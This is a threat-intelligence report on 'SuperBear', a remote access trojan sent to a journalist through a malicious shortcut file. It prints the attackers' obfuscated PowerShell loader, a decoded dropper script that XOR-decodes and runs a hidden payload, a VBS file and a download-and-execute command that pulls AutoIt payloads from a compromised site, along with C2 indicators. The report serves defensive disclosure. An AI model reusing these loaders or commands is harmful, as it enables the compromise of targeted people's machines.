01 Sep Novel RAT discovered “SuperBear” targeting journalist covering geopolitics of Asia
Analysis of novel RAT discovered dubbed “SuperBear”. The RAT has been found targeting journalist and deployed using open-source AutoIT scripts.
Author : Ovi Liber
POST UPDATED: 9/18/2023
Executive Summary
On 8/28/2023, Interlab received a sample sent to a journalist with highly targeted content luring the recipient to open the document. The journalist received an email from an activist who was contacted by an address impersonating a member of the organisation with a malicious document. The document was in .LNK form, and upon execution loaded a malicious powershell command and a legitimate DOCX related to the organization.
After analysis, Interlab discovered that after initial compromise, the execution of an AutoIT script that was used to perform process injection using a process hollowing technique. The injected process contained a novel RAT, which we dubbed “SuperBear” due to naming conventions in the code. We believe this to be a new campaign targeting civil society groups.
Initial compromise method
Once the .LNK file was executed, a command line argument was invoked, spawning a hidden Powershell window along side the legitimate document. The actor utilized a common obfuscation technique to load Powershell and execute a command:
epf8flFowfjovacaXodqZojwof8923jofawejolcvbnNBEOAiwfWClddonv328aJfjoewqweipPeeifGeifCVaieajefielfldnaashfuewfvkdjvnkfhafbawleawapawhfkdjhadsfnkk||goto&p^ow^e^rs^he^l^l
A Powershell command is then executed in a hidden window. Here is the full command:
"C:\Windows\System32\cmd.exe" /c epf8flFowfjovacaXodqZojwof8923jofawejolcvbnNBEOAiwfWClddonv328aJfjoewqweipPeeifGeifCVaieajefielfldnaashfuewfvkdjvnkfhafbawleawapawhfkdjhadsfnkk||goto&p^ow^e^rs^he^l^l -windowstyle hidden $hieracy="$tuneba='REDACTED';$bytes = for($i = 0; $i -lt $tuneba.Length;$i += 2){[System.Convert]::ToByte($tuneba.Substring($i, 2), 16);};$hoikd = [System.Text.Encoding]::ASCII.GetString($bytes);$hoikd = $hoikd -replace '-eitlkdg-', '_.length -eq 0x00015CEB}';$hoikd = $hoikd -replace '-lgjlkdr-', 'select -Skip 0x0000438D';Invoke-Expression $hoikd;";Invoke-Expression $hieracy;
The command converts HEX values to ASCII, the decoded value, is then executed. That value is the following command, which we have prettified and added comments to explain each step:
function getBodyPath(){
$lnkpath = Get-ChildItem *.lnk; # Get a list of all .lnk files in the current directory
$lnkpath = $lnkpath | where-object { $_.length -eq 0x00015CEB ; $lnkpath1 = $lnkpath; $lnkpath = $lnkpath | Select-Object -ExpandProperty Name;}
if($lnkpath.length -eq 0){
Set-Location $env:TEMP; # Change to the temporary directory
$lnkpath = Get-ChildItem *.lnk; # Get a list of .lnk files in the temporary directory
$lnkpath = $lnkpath | where-object { $_.length -eq 0x00015CEB ; $lnkpath1 = $lnkpath; $lnkpath = $lnkpath | Select-Object -ExpandProperty Name;}
}
return @($lnkpath, $lnkpath1); # Return an array containing the .lnk filename and another variable
}
function getImgContent(){
$path = getBodyPath; # Get the .lnk filename from the previous function
$lnkpath = $path[0]; # Extract the .lnk filename from the array
$file = gc $lnkpath -Encoding Byte; # Read the content of the .lnk file as bytes
return $file; # Return the byte array representing the content
}
function makepath(){
$path = getBodyPath; # Get the .lnk filename from the previous function
$lnkpath = $path[0]; # Extract the .lnk filename from the array
$lnkpath = $lnkpath.substring(0,$lnkpath.length-4); # Remove the ".lnk" extension
return $lnkpath; # Return the modified path
}
function changecontent(){
$file = getImgContent; # Get the content of the .lnk file as bytes
for($i=0; $i -lt $file.count; $i++) {
$file[$i] = $file[$i] -bxor 0x77; # Apply bitwise XOR operation with 0x77 to each byte
}
return $file; # Return the modified byte array
}
function subsave(){
$path = makepath; # Get the modified path without ".lnk" extension
$bytes = changecontent; # Get the modified content as bytes
$temp = $bytes | select -Skip 0x0000438D ; # Skip elements in the array
sc $path ([byte[]]$temp) -Encoding Byte; # Write the modified content to a file at the modified path
return @($path, $bytes); # Return the modified path and byte array
}
function savecontent(){
$_a_res = subsave; # Get the modified path and byte array from the previous function
return @($_a_res[0], $path1); # Return the modified path and an undefined variable $path1
}
$_a_path = savecontent; # Get the modified path and an undefined variable $path1 from the previous function
$path1 = '.\' + $_a_path[0]; # Construct a new path by concatenating with ".\"
& $path1; # Execute the PowerShell script at the new path
$path2 = getBodyPath; # Get the .lnk filename and another variable from the first function
remove-item -path $path2[1] -force; # Remove the file specified in the second position of the array
$bear = '...'; # An obfuscated string
$bytes1 = for($i = 0; $i -lt $bear.Length; $i += 2){
[System.Convert]::ToByte($bear.Substring($i, 2), 16); # Decode the obfuscated string to a byte array
}
$foxtern = [System.Text.Encoding]::ASCII.GetString($bytes1); # Convert the byte array to an ASCII string
$decodeString = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($foxtern)); # Base64 decode and convert to a UTF-8 string
$randomString = [System.IO.Path]::GetRandomFileName().Replace(".", "").Substring(0, 10); # Generate a random string
$randomString;
$tankPath = $env:userprofile + '\links' + '\' + $randomString + '.' + 'v' + 'b' + 's'; # Construct a path in the user's profile directory
$decodeString | Set-Content -Path $tankPath; # Write the decoded string content to the file
& $tankPath; # Execute the script at the new path
The result of this is a VBS script, saved to the user profile directory that contains the following script:
JzUnwoizAnveuUlFq = Replace("Shsuelsul.suApsuplsuicsuatsuiosun","su","")
on error resume next
on error resume next
on error resume next
JzUnwoizAnveuUlFqs = Replace("cmsud","su","")
JzUnwoizAnveuUlFqss = Replace("/csu msukdsuir csu:su\dsubhg & csud /sud c:su\dbsuhg & cosupy csu:su\winsudows\ssuyssutemsu32\cusurl.exsue dbsuhg.esuxesu su& dbsuhg -suo Ausutoitsu3.esuxsue hsuttsupssu:su/su/REDACTED.me/wsup-consutent/ssuolsumir.psudb & dsubhg -o MTdsuYFp.au3 hsuttsupssu:/su/REDACTED.me/wsup-suconsutesunt/ssuolmisur_1su.supdsub su& suAusutsuosuit3.esuxe MTsudYsuFp.ausu3","su","")
CreateObject(JzUnwoizAnveuUlFq).ShellExecute JzUnwoizAnveuUlFqs, JzUnwoizAnveuUlFqss ,"","",0
WScript.Quit
MsgBox "VEKE"
This VBS script, simply has added “su” in each command to evade signatures that are file based detection. The de-obfuscated result of the command looks like this:
cmd /c mkdir c:\dbhg & cd /d c:\dbhg & copy c:\windows\system32\curl.exe dbhg.exe & dbhg -o Autoit3.exe https://REDACTED.me/wp-content/solmir.pdb & dbhg -o MTdYFp.au3 https://REDACTED.me/wp-content/solmir_1.pdb & Autoit3.exe MTdYFp.au3
The payload delivery website is a compromised wordpress instance of a legitimate website. For this reason, we have redacted it from the report and reached out to the owner to inform them of the compromise.
As you can see, the command is pulling two payloads from the domain. These two payloads are:
1. AutoIT3 executable with filename “solmir.pdb” renamed to Autoit3.exe – this is an open-source technology (https://www.autoitscript.com/site/autoit/)
2. A compiled and packed AutoIT3 script called with the filename “solmir_1.pdb” which is renamed to “MTdYFp.au3”
Once the executable and compiled script are downloaded, AutoIT3 is executed with a parameter of the compiled script. The script is then executed and performs a process injection operation.
AutoIT process injection using process hollowing
The AutoIT script performs a typical process hollowing operation by calling native Windows API calls. It first calls “CreateProcess” to spawn an instance of Explorer.exe which includes a suspend process flag. The suspended process is then unmapped using “NtUnmapViewOfSection” before being written with the malicious code. It is then resumed via “VirtualAllocEx”, “WriteProcessMemory”, “SetThreatContext” and then “ResumeThread”.
It should be noted that we have provided some additional context on the bottom of this article of the threat actors utilization of AutoIT.
The malicious code in this malware campaign appeared to be a novel remote access trojan which we dubbed SuperBear RAT. This variant of SuperBear RAT established a connection to a C2 server located at:
IP Address: 89[.]117[.]139[.]230
Domain: hironchk[.]com
The RAT performs one of 3 primary attack operations:
1. Exfiltrate process and system data
2. Download and execute a shell command
3. Download and run a DLL
The default action for the C2 server appears to instruct clients to exfiltrate and process system data. This is often typical of attack campaigns distributed by this group, as they are careful about reconnaissance, an example of this can be seen below. The threat actors can also instruct the RAT to execute shell commands or download a malicious DLL onto the infected machine. The malicious DLL will try to create a random filename for it, and if it can’t it will be named “SuperBear”.
Interlab threat researcher Ovi, has documented a full technical report of SuperBear RAT on the authoring threat researchers blog here.
Additional context on attribution & surrounding open-source usage
Based on similarities within initial attack vector and correlations with code across multiple campaigns we have tracked, we have a lose attribution for this campaign to Kimsuky. It should be noted that so far we have no indication of infrastructure overlaps with Kimsuky clusters hence why we only suspect this at this time. In addition to this, we see a strong overlap with commands utilized in a recent campaign detailed here (https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247493300&idx=1&sn=614dda72d95b5dfd732916aec0662598&cur_album_id=1915287066892959748#rd) which indicate like for like Powershell commands during initial access. We invite industry to contribute on this.
The AutoIT utilization found in this campaign used for process hollowing, was found to be a modified script taken from various forums:
– https://www.autoitscript.com/forum/topic/99412-run-binary/page/8/
– https://syra.forumcommunity.net/?t=55181142
– https://autoit-script.ru/threads/peredacha-parametrov-komandnoj-stroki.24834/
This is an interesting and notable feature of operations ran by Kimsuky. This is a novel attack vector that we have seen. Kimsuky have been notably using open-source tooling in the past, such as utilizing malware’s such Quasar RAT. There have been multiple reports of other North Korean threat groups adopting open-source tooling in recent operations (https://blog.talosintelligence.com/lazarus-collectionrat/).
With regard to SuperBear RAT. We base our analysis of this as novel due to not matching signatures of data found in the RAT itself. We have yet to find a similar sample in retro hunting, though this is subject to change. We invite additional research from other civil society groups & industry.
UPDATE 9/18/2023: We are now aware that the foundational code from this RAT has been taken from this open-source loader framework called Chimera Loader. We notice key features of the RAT that are different from Chimera Loader that allow SuperBear to act as a RAT which exfiltrates information. We hope to perform further analysis on this in the future.
IOCs
|
Context |
Filename |
Hash |
|
AutoIT script |
solmir_1.pdb |
5305b8969b33549b6bd4b68a3f9a2db1e3b21c5497a5d82cec9beaeca007630e |
|
SuperBear RAT (dumped PE) |
4000.explorer.exe |
282e926eb90960a8a807dd0b9e8668e39b38e6961b0023b09f8b56d287ae11cb |
|
C2 IP |
N/A |
89[.]117[.]139[.]230 |
|
C2 Domain |
N/A |
hironchk[.]com |
Sample exchange
VT Collection:
https://www.virustotal.com/gui/collection/454cfe3be695d0a387d7877c11d3b224b3e2c7d22fc2f31f349b5c23799967ec/summary
Malware Bazaar:
– SuperBear RAT (dumped PE from memory): https://bazaar.abuse.ch/sample/282e926eb90960a8a807dd0b9e8668e39b38e6961b0023b09f8b56d287ae11cb
-AutoIT process injector: https://bazaar.abuse.ch/sample/5305b8969b33549b6bd4b68a3f9a2db1e3b21c5497a5d82cec9beaeca007630e/
Interlab is a non-profit organization based in Seoul with mission to create resilient digital safety net for freedom of citizens, providing free digital security consultations, trainings, incident response support and research of cyber threat toward civic society.
For any inquiries regarding on this report, please reach us through contact@interlab.or.kr